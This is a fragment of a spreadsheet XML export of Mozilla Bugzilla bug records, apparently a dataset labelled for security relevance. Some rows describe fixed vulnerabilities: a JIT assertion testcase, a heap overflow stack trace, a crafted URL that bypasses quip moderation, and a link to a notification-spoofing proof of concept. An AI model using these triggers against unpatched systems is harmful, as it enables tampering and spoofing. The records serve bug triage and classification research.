        </is>
      </c>
      <c r="M6022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6022" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6022" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6022" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q6022" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6022" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6022" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T6022" t="n">
        <v>1</v>
      </c>
      <c r="U6022" t="n">
        <v>0</v>
      </c>
      <c r="V6022" t="n">
        <v>28</v>
      </c>
      <c r="W6022" t="inlineStr">
        <is>
          <t>Like permanent atoms, I think we need to exclude these from barriers as they may be used from different runtimes.</t>
        </is>
      </c>
      <c r="X6022" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6023">
      <c r="A6023" t="n">
        <v>1204700</v>
      </c>
      <c r="B6023" t="inlineStr">
        <is>
          <t>2015-09-14 16:48:35 -0700</t>
        </is>
      </c>
      <c r="C6023" t="inlineStr">
        <is>
          <t>Assertion failure: !has(reg), at jit/RegisterSets.h</t>
        </is>
      </c>
      <c r="D6023" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:44 -0700</t>
        </is>
      </c>
      <c r="E6023" t="n">
        <v>1</v>
      </c>
      <c r="F6023" t="n">
        <v>1</v>
      </c>
      <c r="G6023" t="n">
        <v>3</v>
      </c>
      <c r="H6023" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6023" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6023" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K6023" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6023" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6023" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6023" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6023" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6023" t="inlineStr">
        <is>
          <t>[jsbugmon:update][post-critsmash-triage][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q6023" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6023" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6023" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T6023" t="n">
        <v>1</v>
      </c>
      <c r="U6023" t="n">
        <v>0</v>
      </c>
      <c r="V6023" t="n">
        <v>34</v>
      </c>
      <c r="W6023" t="inlineStr">
        <is>
          <t>var x = [];
var y = [];
for (var i = 0; i &lt; 3; i++) {
    y.push(x);
}
asserts js 32-bit debug ARM-simulator shell on m-c changeset fba4b0cd3823 with --fuzzing-safe --no-threads --ion-eager --unboxed-arrays at Assertion failure: !has(reg), at jit/RegisterSets.h
Configure options:
LD=ld CROSS_COMPILE=1 CC="clang -Qunused-arguments -msse2 -mfpmath=sse -arch i386" RANLIB=ranlib CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse -arch i386" AS=$CC AR=ar STRIP="strip -x -S" HOST_CC="clang -Qunused-arguments -msse2 -mfpmath=sse" AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 HOST_CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse" sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=i386-apple-darwin9.2.0 --enable-macos-target=10.5 --enable-arm-simulator --enable-simulator=arm --enable-debug --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
python -u ~/funfuzz/js/compileShell.py -b "--32 --enable-debug --enable-nspr-build --enable-more-deterministic --enable-simulator=arm" -r fba4b0cd3823
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/8b68a9f000b3
user:        Nicolas B. Pierron
date:        Wed Aug 26 20:48:05 2015 +0200
summary:     Bug 1190446 - Update Coverage information in Baseline. r=jandem
Nicolas, is bug 1190446 a likely regressor?</t>
        </is>
      </c>
      <c r="X6023" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6024">
      <c r="A6024" t="n">
        <v>55418</v>
      </c>
      <c r="B6024" t="inlineStr">
        <is>
          <t>2000-10-05 16:19:33 -0700</t>
        </is>
      </c>
      <c r="C6024" t="inlineStr">
        <is>
          <t>Dependency graph doesn't display</t>
        </is>
      </c>
      <c r="D6024" t="inlineStr">
        <is>
          <t>2013-12-27 14:29:18 -0800</t>
        </is>
      </c>
      <c r="E6024" t="n">
        <v>1</v>
      </c>
      <c r="F6024" t="n">
        <v>1</v>
      </c>
      <c r="G6024" t="n">
        <v>7</v>
      </c>
      <c r="H6024" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6024" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J6024" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6024" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6024" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6024" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6024" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6024" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6024" t="inlineStr"/>
      <c r="Q6024" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6024" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6024" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6024" t="n">
        <v>1</v>
      </c>
      <c r="U6024" t="n">
        <v>0</v>
      </c>
      <c r="V6024" t="n">
        <v>20</v>
      </c>
      <c r="W6024" t="inlineStr">
        <is>
          <t>If you choose dependency graph for a bug (see URL) it doesn't display the
dependency graph.  It just displays a broken image icon.</t>
        </is>
      </c>
      <c r="X6024" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6025">
      <c r="A6025" t="n">
        <v>793253</v>
      </c>
      <c r="B6025" t="inlineStr">
        <is>
          <t>2012-09-21 11:36:36 -0700</t>
        </is>
      </c>
      <c r="C6025" t="inlineStr">
        <is>
          <t>Supposedly infallible TArray can fail to allocate a buffer</t>
        </is>
      </c>
      <c r="D6025" t="inlineStr">
        <is>
          <t>2013-03-18 13:12:08 -0700</t>
        </is>
      </c>
      <c r="E6025" t="n">
        <v>1</v>
      </c>
      <c r="F6025" t="n">
        <v>1</v>
      </c>
      <c r="G6025" t="n">
        <v>3</v>
      </c>
      <c r="H6025" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6025" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6025" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K6025" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6025" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6025" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6025" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6025" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6025" t="inlineStr">
        <is>
          <t>[adv-track-main17+][qa?]</t>
        </is>
      </c>
      <c r="Q6025" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6025" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6025" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T6025" t="n">
        <v>1</v>
      </c>
      <c r="U6025" t="n">
        <v>0</v>
      </c>
      <c r="V6025" t="n">
        <v>12</v>
      </c>
      <c r="W6025" t="inlineStr">
        <is>
          <t>nsTArray_base&lt;Alloc&gt;::EnsureCapacity has this bit:
  if ((uint64_t)capacity * elemSize &gt; size_type(-1)/2) {
    NS_ERROR("Attempting to allocate excessively large array");
    return false;
  }
If Alloc is nsTArrayInfallibleAllocator, we should be aborting here, instead of returning false, I believe.</t>
        </is>
      </c>
      <c r="X6025" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6026">
      <c r="A6026" t="n">
        <v>1402372</v>
      </c>
      <c r="B6026" t="inlineStr">
        <is>
          <t>2017-09-22 09:16:14 -0700</t>
        </is>
      </c>
      <c r="C6026" t="inlineStr">
        <is>
          <t>heap buffer overflow in VertexBuffer9 (ANGLE)</t>
        </is>
      </c>
      <c r="D6026" t="inlineStr">
        <is>
          <t>2024-05-30 09:37:00 -0700</t>
        </is>
      </c>
      <c r="E6026" t="n">
        <v>1</v>
      </c>
      <c r="F6026" t="n">
        <v>1</v>
      </c>
      <c r="G6026" t="n">
        <v>3</v>
      </c>
      <c r="H6026" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6026" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6026" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K6026" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L6026" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6026" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6026" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6026" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6026" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main57+][adv-esr52.5.1+]</t>
        </is>
      </c>
      <c r="Q6026" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6026" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6026" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T6026" t="n">
        <v>1</v>
      </c>
      <c r="U6026" t="n">
        <v>0</v>
      </c>
      <c r="V6026" t="n">
        <v>78</v>
      </c>
      <c r="W6026" t="inlineStr">
        <is>
          <t>Created attachment 8911233
D3D9.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Steps to reproduce:
I have attached the same PoC (Bug 1398381) which can be used to trigger a heap overflow in ANGLE. 
(You can disable hardware acceleration and test.)
I have tested this on: 58 nightly build (should be applicable to the current stable build as well)
libglesv2.dll!memcpy + ? (the exact offset is not known) (id: 72d)
libglesv2.dll!rx::VertexBuffer9::storeVertexAttributes + 0x1D4 (id: 791) [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\vertexbuffer9.cpp @ 109]]
libglesv2.dll!rx::StreamingVertexBufferInterface::storeDynamicAttribute + 0x204 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexbuffer.cpp @ 173]]
libglesv2.dll!rx::VertexDataManager::storeDynamicAttrib + 0x240 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 480]]
libglesv2.dll!rx::VertexDataManager::storeDynamicAttribs + 0x25A [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 400]]
libglesv2.dll!rx::VertexDataManager::prepareVertexData + 0x2DA [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 275]]
libglesv2.dll!rx::Renderer9::applyVertexBuffer + 0x5E [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\renderer9.cpp @ 1285]]
libglesv2.dll!rx::Renderer9::genericDrawElements + 0x1A8 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\renderer9.cpp @ 2984]]
libglesv2.dll!rx::Context9::drawElements + 0x47 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\context9.cpp @ 157]]
libglesv2.dll!gl::Context::drawElements + 0x33 (inlined function) [[z:\build\build\src\gfx\angle\src\libangle\context.cpp @ 1654]]
libglesv2.dll!gl::DrawElements + 0xB2 [[z:\build\build\src\gfx\angle\src\libglesv2\entry_points_gles_2_0.cpp @ 791]]
xul.dll!mozilla::gl::GLContext::raw_fDrawElements + 0x1A (inlined function) [[z:\build\build\src\gfx\gl\glcontext.h @ 1101]]
xul.dll!mozilla::gl::GLContext::fDrawElements + 0x26 [[z:\build\build\src\gfx\gl\glcontext.h @ 1115]]
xul.dll!mozilla::WebGLContext::DrawElements + 0x13F [[z:\build\build\src\dom\canvas\webglcontextdraw.cpp @ 811]]
xul.dll!mozilla::dom::WebGLRenderingContextBinding::drawElements + 0xB6 [[z:\build\build\src\obj-firefox\dom\bindings\webglrenderingcontextbinding.cpp @ 16256]]
xul.dll!mozilla::dom::GenericBindingMethod + 0x12A [[z:\build\build\src\dom\bindings\bindingutils.cpp @ 3061]]
xul.dll!js::CallJSNative + 0xA3 (inlined function) [[z:\build\build\src\js\src\jscntxtinlines.h @ 293]]
xul.dll!InternalCall + ? (the exact offset is not known) [[z:\build\build\src\js\src\vm\interpreter.cpp @ 495]]
xul.dll!js::CallFromStack + 0xD (inlined function) [[z:\build\build\src\js\src\vm\interpreter.cpp @ 546]]
xul.dll!js::jit::DoCallFallback + 0x24A [[z:\build\build\src\js\src\jit\baselineic.cpp @ 2589]]
0x2E8E572D08E (no function symbol available)
0x18453FC480 (no function symbol available)
0x18453FC1B0 (no function symbol available)
0xFFFE01216EA6D940 (no function symbol available)
0xEEE4421FD838 (no function symbol available)
0x18453FC430 (no function symbol available)
0x18453FC3E8 (no function symbol available)
0x4 (no function symbol available)
0x18453FC3E8 (no function symbol available)</t>
        </is>
      </c>
      <c r="X6026" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6027">
      <c r="A6027" t="n">
        <v>464998</v>
      </c>
      <c r="B6027" t="inlineStr">
        <is>
          <t>2008-11-14 15:22:23 -0800</t>
        </is>
      </c>
      <c r="C6027" t="inlineStr">
        <is>
          <t>integer overflow in nsEscape, still</t>
        </is>
      </c>
      <c r="D6027" t="inlineStr">
        <is>
          <t>2009-04-20 10:55:47 -0700</t>
        </is>
      </c>
      <c r="E6027" t="n">
        <v>1</v>
      </c>
      <c r="F6027" t="n">
        <v>1</v>
      </c>
      <c r="G6027" t="n">
        <v>3</v>
      </c>
      <c r="H6027" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6027" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6027" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K6027" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6027" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6027" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6027" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6027" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6027" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q6027" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6027" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6027" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T6027" t="n">
        <v>1</v>
      </c>
      <c r="U6027" t="n">
        <v>0</v>
      </c>
      <c r="V6027" t="n">
        <v>19</v>
      </c>
      <c r="W6027" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #455987 +++
+++ This bug was initially created as a clone of Bug #445117 +++
bug 455987 tried to fix this, but I added when I should have subtracted the size of the terminator in nsEscapeHTML2.</t>
        </is>
      </c>
      <c r="X6027" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6028">
      <c r="A6028" t="n">
        <v>931946</v>
      </c>
      <c r="B6028" t="inlineStr">
        <is>
          <t>2013-10-28 11:14:14 -0700</t>
        </is>
      </c>
      <c r="C6028" t="inlineStr">
        <is>
          <t>Add ratings to listing and top of detail pages</t>
        </is>
      </c>
      <c r="D6028" t="inlineStr">
        <is>
          <t>2013-10-30 03:35:28 -0700</t>
        </is>
      </c>
      <c r="E6028" t="n">
        <v>1</v>
      </c>
      <c r="F6028" t="n">
        <v>1</v>
      </c>
      <c r="G6028" t="n">
        <v>6</v>
      </c>
      <c r="H6028" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6028" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J6028" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K6028" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L6028" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6028" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6028" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6028" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6028" t="inlineStr"/>
      <c r="Q6028" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6028" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6028" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6028" t="n">
        <v>1</v>
      </c>
      <c r="U6028" t="n">
        <v>0</v>
      </c>
      <c r="V6028" t="n">
        <v>2</v>
      </c>
      <c r="W6028" t="inlineStr">
        <is>
          <t>Just simple text on these pages.  See https://bug929805.bugzilla.mozilla.org/attachment.cgi?id=822461 and https://bug929805.bugzilla.mozilla.org/attachment.cgi?id=822464
UX: https://bugzilla.mozilla.org/show_bug.cgi?id=929805
Our Spec: https://docs.google.com/a/mozilla.com/document/d/1vc-pDhbFYKMDbA3Yamr8InA2M7kerBdc39qzPwIUMqk/edit#
IARC docs: https://docs.google.com/a/mozilla.com/file/d/0B96RwPRmGwk7LWc5Zjhrc2V5WXM/edit?usp=sharing</t>
        </is>
      </c>
      <c r="X6028" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6029">
      <c r="A6029" t="n">
        <v>449931</v>
      </c>
      <c r="B6029" t="inlineStr">
        <is>
          <t>2008-08-09 03:29:54 -0700</t>
        </is>
      </c>
      <c r="C6029" t="inlineStr">
        <is>
          <t>[SECURITY] Unprivileged users can approve/unapprove all the quips (including bypassing moderation)</t>
        </is>
      </c>
      <c r="D6029" t="inlineStr">
        <is>
          <t>2008-11-10 14:43:16 -0800</t>
        </is>
      </c>
      <c r="E6029" t="n">
        <v>1</v>
      </c>
      <c r="F6029" t="n">
        <v>1</v>
      </c>
      <c r="G6029" t="n">
        <v>4</v>
      </c>
      <c r="H6029" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6029" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6029" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K6029" t="inlineStr">
        <is>
          <t>2.17.4</t>
        </is>
      </c>
      <c r="L6029" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6029" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6029" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6029" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6029" t="inlineStr"/>
      <c r="Q6029" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6029" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6029" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T6029" t="n">
        <v>1</v>
      </c>
      <c r="U6029" t="n">
        <v>0</v>
      </c>
      <c r="V6029" t="n">
        <v>28</v>
      </c>
      <c r="W6029" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; da; rv:1.9) Gecko/2008052912 Firefox/3.0
Build Identifier: Bugzilla 3.0.4
After one of our developers were playing around with the quip system in our Bugzilla setup he figured out that he could unapprove all our quips by visiting a specially crafted URL. 
For example: http://bugs.example.org/quips.cgi?action=approve
Our current quip setup is set to be 'moderated', but that doesn't change the outcome of the above URL.
Reproducible: Always
Steps to Reproduce:
1. Visit http://bugs.example.org/quips.cgi?action=approve
2. Wait for a Bugzilla admin to kill you.
Actual Results:  
Unapproving all the quips in the database
Expected Results:  
Show some access denied error or at least not unapprove all the quips :)
Perhaps it would be nice to create a group where the Bugzilla admins can put users in so that those users are allowed to approve bugs. But that's probably a feature request.</t>
        </is>
      </c>
      <c r="X6029" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6030">
      <c r="A6030" t="n">
        <v>477775</v>
      </c>
      <c r="B6030" t="inlineStr">
        <is>
          <t>2009-02-10 03:54:34 -0800</t>
        </is>
      </c>
      <c r="C6030" t="inlineStr">
        <is>
          <t>Crash with iExploder test 2203 [@ nsComputedDOMStyle::GetWidth]</t>
        </is>
      </c>
      <c r="D6030" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E6030" t="n">
        <v>1</v>
      </c>
      <c r="F6030" t="n">
        <v>1</v>
      </c>
      <c r="G6030" t="n">
        <v>3</v>
      </c>
      <c r="H6030" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6030" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6030" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6030" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6030" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6030" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6030" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6030" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6030" t="inlineStr">
        <is>
          <t>[sg:critical?] using destroyed frame [depends on bug 454276] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q6030" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6030" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6030" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T6030" t="n">
        <v>1</v>
      </c>
      <c r="U6030" t="n">
        <v>0</v>
      </c>
      <c r="V6030" t="n">
        <v>17</v>
      </c>
      <c r="W6030" t="inlineStr">
        <is>
          <t>Created attachment 361494
Testcase
Crash with iExploder test 2203 [@ nsComputedDOMStyle::GetWidth]
bp-4c74fadc-f5ec-448a-8431-90d0e2090210
@0x0	
nsComputedDOMStyle::GetWidth	layout/style/nsComputedDOMStyle.cpp:2888
nsComputedDOMStyle::GetPropertyCSSValue	layout/style/nsComputedDOMStyle.cpp:366
nsComputedDOMStyle::GetPropertyValue	layout/style/nsComputedDOMStyle.cpp:300
nsComputedDOMStyle::GetPropertyValue	layout/style/nsComputedDOMStyle.cpp:244
CSS2PropertiesTearoff::GetWidth	layout/style/nsCSSPropList.h:543
NS_InvokeByIndex_P	xpcom/reflect/xptcall/src/md/unix/xptcinvoke_unixish_x86.cpp:179
XPCWrappedNative::CallMethod	js/src/xpconnect/src/xpcwrappednative.cpp:2424
XPC_WN_GetterSetter	js/src/xpconnect/src/xpcprivate.h:2298
js_Invoke	js/src/jsinterp.cpp:1316
js_InternalInvoke	js/src/jsinterp.cpp:1392
JS_CallFunctionValue	js/src/jsapi.cpp:5299
XPCWrapper::GetOrSetNativeProperty	js/src/xpconnect/src/XPCWrapper.cpp:717
XPC_NW_GetOrSetProperty	js/src/xpconnect/src/XPCNativeWrapper.cpp:597
js_NativeGet	js/src/jsobj.cpp:3853
js_GetPropertyHelper	js/src/jsobj.cpp:4023
js_Interpret	js/src/jsinterp.cpp:4297
js_Invoke	js/src/jsinterp.cpp:1334
nsXPCWrappedJSClass::CallMethod	js/src/xpconnect/src/xpcwrappedjsclass.cpp:1606
nsXPCWrappedJS::CallMethod	js/src/xpconnect/src/xpcwrappedjs.cpp:561
PrepareAndDispatch	xpcom/reflect/xptcall/src/md/unix/xptcstubs_unixish_x86.cpp:93
PrepareAndDispatch	
nsEventListenerManager::HandleEventSubType	content/events/src/nsEventListenerManager.cpp:1079
nsEventListenerManager::HandleEvent	content/events/src/nsEventListenerManager.cpp:1176
nsEventTargetChainItem::HandleEvent	content/events/src/nsEventDispatcher.cpp:227
nsEventTargetChainItem::HandleEventTargetChain	content/events/src/nsEventDispatcher.cpp:291
nsEventDispatcher::Dispatch	content/events/src/nsEventDispatcher.cpp:508
DocumentViewerImpl::LoadComplete	layout/base/nsDocumentViewer.cpp:997
nsDocShell::EndPageLoad	docshell/base/nsDocShell.cpp:5243
nsWebShell::EndPageLoad	docshell/base/nsWebShell.cpp:1015
nsDocShell::OnStateChange	docshell/base/nsDocShell.cpp:5139
nsDocLoader::FireOnStateChange	uriloader/base/nsDocLoader.cpp:1235
nsDocLoader::doStopDocumentLoad	uriloader/base/nsDocLoader.cpp:858
nsDocLoader::DocLoaderIsEmpty	uriloader/base/nsDocLoader.cpp:763
nsDocLoader::OnStopRequest	uriloader/base/nsDocLoader.cpp:679
nsLoadGroup::RemoveRequest	netwerk/base/src/nsLoadGroup.cpp:688
nsDocument::DoUnblockOnload	content/base/src/nsDocument.cpp:7080
nsDocument::DispatchContentLoadedEvents	content/base/src/nsDocument.cpp:3983
nsRunnableMethod&lt;nsDocument&gt;::Run	nsThreadUtils.h:264
nsThread::ProcessNextEvent	xpcom/threads/nsThread.cpp:510
NS_ProcessPendingEvents_P	nsThreadUtils.cpp:180
nsBaseAppShell::NativeEventCallback	widget/src/xpwidgets/nsBaseAppShell.cpp:121
nsAppShell::ProcessGeckoEvents	widget/src/cocoa/nsAppShell.mm:381
CoreFoundation@0x735f4	
CoreFoundation@0x73cd7	
HIToolbox@0x302bf	
HIToolbox@0x300d8	
HIToolbox@0x2ff4c	
AppKit@0x40d7c	
AppKit@0x4062f	
AppKit@0x3966a	
nsAppShell::Run	widget/src/cocoa/nsAppShell.mm:700
nsAppStartup::Run	toolkit/components/startup/src/nsAppStartup.cpp:192
XRE_main	toolkit/xre/nsAppRunner.cpp:3216
main	browser/app/nsBrowserApp.cpp:156</t>
        </is>
      </c>
      <c r="X6030" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6031">
      <c r="A6031" t="n">
        <v>1821906</v>
      </c>
      <c r="B6031" t="inlineStr">
        <is>
          <t>2023-03-12 06:25:04 -0700</t>
        </is>
      </c>
      <c r="C6031" t="inlineStr">
        <is>
          <t>Geolocation permission hide notification fullscreen</t>
        </is>
      </c>
      <c r="D6031" t="inlineStr">
        <is>
          <t>2024-05-30 11:06:48 -0700</t>
        </is>
      </c>
      <c r="E6031" t="n">
        <v>1</v>
      </c>
      <c r="F6031" t="n">
        <v>1</v>
      </c>
      <c r="G6031" t="n">
        <v>2</v>
      </c>
      <c r="H6031" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6031" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J6031" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6031" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6031" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6031" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6031" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6031" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6031" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q6031" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6031" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S6031" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T6031" t="n">
        <v>1</v>
      </c>
      <c r="U6031" t="n">
        <v>0</v>
      </c>
      <c r="V6031" t="n">
        <v>13</v>
      </c>
      <c r="W6031" t="inlineStr">
        <is>
          <t>Created attachment 9322600
video_2023-03-12_20-21-24.mp4
I found a vulnerability in firefox nightly (i tested on Samsung M31 ) where a geolocation permission alert notification can cover fullscreen notifications which can lead to spoofs.
step to reproduces:
1. https://pipabajabakrie.com/upload/geofullscreen.html
2. click on button "Try it"</t>
        </is>
      </c>
